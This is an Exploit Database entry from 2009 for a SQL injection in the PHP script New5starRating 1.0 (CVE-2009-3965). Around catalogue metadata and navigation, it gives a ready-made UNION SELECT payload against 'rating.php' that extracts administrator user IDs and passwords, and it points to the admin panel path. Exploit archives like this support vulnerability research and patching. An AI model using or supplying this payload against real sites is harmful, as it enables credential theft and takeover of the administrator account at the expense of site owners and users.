Exploit Database - Logo

New5starRating 1.0 - 'rating.php' SQL Injection

EDB-ID: 9499 Author: Bgh7 Published: 2009-08-24
CVE: CVE-2009-3965 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: N/A Tags: Vulnerability
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
New5starRating v1.0 (rating.php) Sql Inj. Vuln.
##################
Yazar: Bgh7
Turk Bilisim Gucleri
##################
Download;
http://www.maniacomputer.com/5star_rating/New_5Star.html
Bug-->Sql Inj.
##################
Exp: rating.php?det=-1 union select userid,0,0,userpass from admin
Panel: /admin/
##################
Thanks: milw0rm-->Str0ke

# milw0rm.com [2009-08-24]

Related Exploits

Trying to match CVEs (1): CVE-2009-3965
Trying to match OSVDBs (1): 60418
Other Possible E-DB Search Terms: New5starRating 1.0,  New5starRating
Date D V Title Author
2009-04-22Download Exploit Code Verified New5starRating 1.0 - 'admin/control_panel_sample.php' SQL Injectionzer0day
Menu